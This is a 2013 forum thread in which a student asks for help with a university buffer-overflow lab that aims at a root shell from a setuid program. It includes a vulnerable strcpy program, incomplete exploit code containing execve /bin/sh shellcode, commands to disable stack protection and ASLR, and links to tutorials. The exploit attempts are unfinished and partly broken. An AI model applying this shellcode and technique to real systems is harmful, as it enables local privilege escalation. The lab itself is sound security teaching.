EonsNearby Posted February 16, 2013 Posted February 16, 2013 I am stuck on a lab assignment where I need to use a version of ubuntu in VMware Player to write some .c files that will use a buffer overflow vulnerability to generate a shell that has root privileges. I can only use the following 2 files: stack.c #include <stdio.h> int bof(char *str) { char buffer[12]; //BO Vulnerability strcpy(buffer,str); return 1; } int main(int argc, char* argv[]) { char str[517]; FILE *badfile; badfile = fopen("badfile","r"); fread(str, sizeof(char),517, badfile); bof(str); printf("Returned Properly\n"); return 1; } exploit.c #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); } Here are the changes I made to exploit.c: #include <stdio.h> #include <stdlib.h> #include <string.h> #define DEFAULT_OFFSET 350 char shellcode[]= "\x31\xc0" "\x50" "\x68""//sh" "\x68""/bin" "\x89\xe3" "\x50" "\x53" "\x89\xe1" "\x99" "\xb0\x0b" "\xcd\x80" ; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char **argv) { char buffer[517]; FILE *badfile; char *ptr; long *a_ptr,ret; int offset = DEFAULT_OFFSET; int codeSize = sizeof(shellcode); int buffSize = sizeof(buffer); if(argc > 1) offset = atoi(argv[1]); //allows for command line input ptr=buffer; a_ptr = (long *) ptr; /* Initialize buffer with 0x90 (NOP instruction) */ memset(buffer, 0x90, buffSize); //----------------------BEGIN FILL BUFFER----------------------\\ ret = get_sp()+offset; printf("Return Address: 0x%x\n",get_sp()); printf("Address: 0x%x\n",ret); ptr = buffer; a_ptr = (long *) ptr; int i; for (i = 0; i < 300;i+=4) *(a_ptr++) = ret; for(i = 486;i < codeSize + 486;++i) buffer[i] = code[i-486]; buffer[buffSize - 1] = '\0'; //-----------------------END FILL BUFFER-----------------------\\ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer,517,1,badfile); fclose(badfile); } I execute the following in a terminal: $ su root $ Password] # gcc -o stack -fno-stack-protector stack.c # chmod 4755 stack # exit $ gcc -o exploit exploit.c $./exploit $./stack The "badfile" is created and a shell is generated, but the shell only has basic user privileges instead of root privileges. Can someone help me with this?
lightburst Posted February 17, 2013 Posted February 17, 2013 You are assuming we know what this buffer overflow vulnerability is.
pwagen Posted February 17, 2013 Posted February 17, 2013 I don't have a computer on which to try this right now, so anything I say might be off. You're supposed to use a buffer overflow vulnerability, that is, you need to write outside of something. However, from the looks of it, you're staying neatly within the boundaries everywhere in your code. http://en.wikipedia.org/wiki/Buffer_overflow#Stack-based_exploitation That link gives a few suggestions on what to overflow - a local variable, a return address or a function pointer. And since the lab is called something in the line of "buffer overflow", and you have a variable called "buffer", I'd start there. Either by making buffer a little smaller, or try to write outside of it by making buffSize a little larger. Hope any of this helps.
EonsNearby Posted February 17, 2013 Author Posted February 17, 2013 I tried increasing the size of bufferSize and codeSize (not at the same time), but still just generates a shell with user privileges. I've tried assigning a value to buffer[517], but even doing that won't generate a shell with root privileges. I know that the overflow occurs in the stack.c file, but I need to fill the "buffer" in exploit.c with the appropriate contents. I just don't know if what I am putting in it are the appropriate contents. I did find this as a possible solution, but I can't get it to work. I don't know if it will be of help or not, but: /* A program that creates a file containing code for launching shell*/ #include <stdlib.h> #include <stdio.h> #include <string.h> char shellcode[] = "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ /* We have to use //sh instead of /sh, because we need 32-bit padding and /sh only uses 24 bits. Linux will ignore the extra slash, so we don't have a problem. */ "\x68""//sh" /* pushl $0x68732f2f */ "\x68""/bin" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ /* Load the arguments for the function on the stack */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ /* Call exec */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; int main(int argc, char **argv) { char buffer[500]; FILE *badfile; int i; unsigned char address[4]; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, sizeof(buffer)); /* You need to fill the buffer with appropriate contents here */ memcpy(&buffer[sizeof(buffer) - 100], shellcode, sizeof(shellcode)); /* Blow away the return address */ /* Don't forget your endian-ness!!!!! */ buffer[16] = 0x00; /* CHANGE ME (so this should be something like 0xB4 instead of 0x00 */ buffer[17] = 0x00; /* CHANGE ME */ buffer[18] = 0x00; /* CHANGE ME */ buffer[19] = 0x00; /* CHANGE ME */ /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, sizeof(buffer), 1, badfile); fclose(badfile); } I don't know what to change those "0x00" to. Before I was supposed to execute any of this, I had to execute this in root echo 0 > /proc/sys/kernel/randomize_va_space The lab however says I need to execute the following in root instead sysctl -w kernel.randomize_va_space=0 However, when I do the second one, then when I try to execute "stack", I get a "Segmentation fault".
EonsNearby Posted February 17, 2013 Author Posted February 17, 2013 I recently found and read this article that talks about pratically the same thing I am trying to do: http://web-agent.appspot.com/insecure.org/stf/smashstack.html Based on this, it sounds like I am getting the exploit correctly, but it just is not generating a root shell. "stack" is set-root-UID program while "exploit" is a user owned program. I am just supposed to run stack as a normal user and not root, which I can do but I can't get a root shell. Now that I know that I am getting the exploit, can someone make a suggestion as to why I am not getting a root shell?
pwagen Posted February 19, 2013 Posted February 19, 2013 (edited) I found a few interesting links regarding your lab. Not sure if any of them helps anything, but especially the first one seems to explain quite a bit, and do things about the same as what you're trying. See if any of them helps, and sorry if you've seen them before! Again, I won't be able to try any of this for a few weeks, so can't vouch for them being accurate, at all. http://www.cis.syr.edu/~wedu/seed/Labs/Vulnerability/Buffer_Overflow/Buffer_Overflow.pdf The next link seems to describe why some older techniques to do what you're trying to do, simply won't work today. http://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/ And one entitled "Stack Smashing on a Modern Linux System". Promising! http://www.exploit-db.com/papers/24085/ Hopefully you can piece together what's going wrong with your code through a few more examples. Edit: Also checking with people I might know, who might have a clue. Because I'd be really interested in the solution. Edited February 19, 2013 by pwagen
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now